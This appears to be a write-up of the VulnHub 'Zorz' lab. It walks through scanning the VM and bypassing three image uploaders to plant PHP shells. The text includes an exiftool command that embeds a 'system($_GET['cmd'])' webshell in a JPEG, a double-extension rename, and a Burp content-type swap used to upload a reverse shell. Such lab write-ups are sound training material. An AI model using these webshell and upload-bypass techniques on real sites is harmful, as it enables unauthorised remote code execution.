Code name: Zorz
VM Download: http://download.vulnhub.com/tophatsec/Zorz.ova
Challange: Bypass all 3 image uploaders
After making sure that Zorz is running under our virtualbox, we proced by running netdiscover as usual.
As our target is running under VirtualBox, it’s MAC address vendor is cadmus computer systems. Now we can run nmap
# nmap -Pn -A -p- 192.168.11.8
Port 80 open as expected, time to put that address on the browser and start the show.
Once we enter the site, a simple image uploader appears. This will be our first “challange”. Our goal is to upload an evil php file. So why don’t just select an evil php file on the browser and directly upload it to the server?
Lelz. File uploaded, so damn easy. But now, where is the file? After uploading the php shell, what we have to do is search for the “uploads” directory. We can start by using nikto.
# nikto -h http://192.168.11.8
Uh, nothing new, except from phpmyadmin(our goal is to pwn nothing more but the uploaders). We can try dirbuster search for hidden dirs
jackpot! uploads1, uploads2 and uploads3. Using logic, our baby must be in the first directory.
Here it is, let’s run it
Everything is working there. Let’s go for the second challange
The second uploader looks just like the first, but there are a few things that work a little bit diferent here. We can see what happens if we try the same trick we did in the first uploader
What if we change the file extension?
Nothing. Well, for the next trick we will need a simple jpeg image. I can create it with gimp
What we will do now, is edit the “Comment” field in the exif data of the image, we will put some evil php code there, exiftool will do the work.
# exiftool -Comment='<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ 3.jpg
Now we can change the extension of that image to .php.jpg
# cp 3.jpg 3.php.jpg
Meanwhile on the web browser…
pwned. Challange 2 completed, only the 3rd uploader remains.
Simple php&jquery uploader. Let’s try a different trick on this one.
What we done here is use the burp suite to change the content type and the filename on the fly, and introduce our php-reverse-shell on the system.
The result has been great, as expected